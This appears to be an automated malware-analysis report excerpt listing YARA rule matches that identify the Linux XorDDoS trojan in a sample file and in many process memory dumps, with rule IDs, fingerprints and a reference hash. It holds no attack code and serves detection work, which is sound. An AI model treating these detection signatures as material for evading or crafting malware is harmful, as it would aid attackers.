        Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6204.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6204.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6204.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6204.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6204.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6204.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6363.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6363.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6363.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6363.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6363.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6363.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6349.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6349.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6349.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6349.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6349.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6349.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6524.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6524.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6524.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6524.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6524.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6524.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6510.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6510.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6510.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6510.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6510.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6510.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6249.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6249.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6249.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6249.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6249.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6249.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6312.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6312.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6312.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6312.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6312.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6312.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6282.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6282.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6282.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6282.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6282.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6282.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6542.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6542.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6542.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6542.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6542.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6542.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6320.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6320.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6320.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6320.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6320.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6320.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6456.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6456.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6456.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6456.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6456.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6456.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6323.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6323.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6323.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6323.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6323.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6323.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6317.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 1.elf, type: SAMPLEMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 1.elf, type: SAMPLEMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 1.elf, type: SAMPLEMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 1.elf, type: SAMPLEMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 1.elf, type: SAMPLEMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 1.elf, type: SAMPLEMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
        Source: 1.elf, type: SAMPLEMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
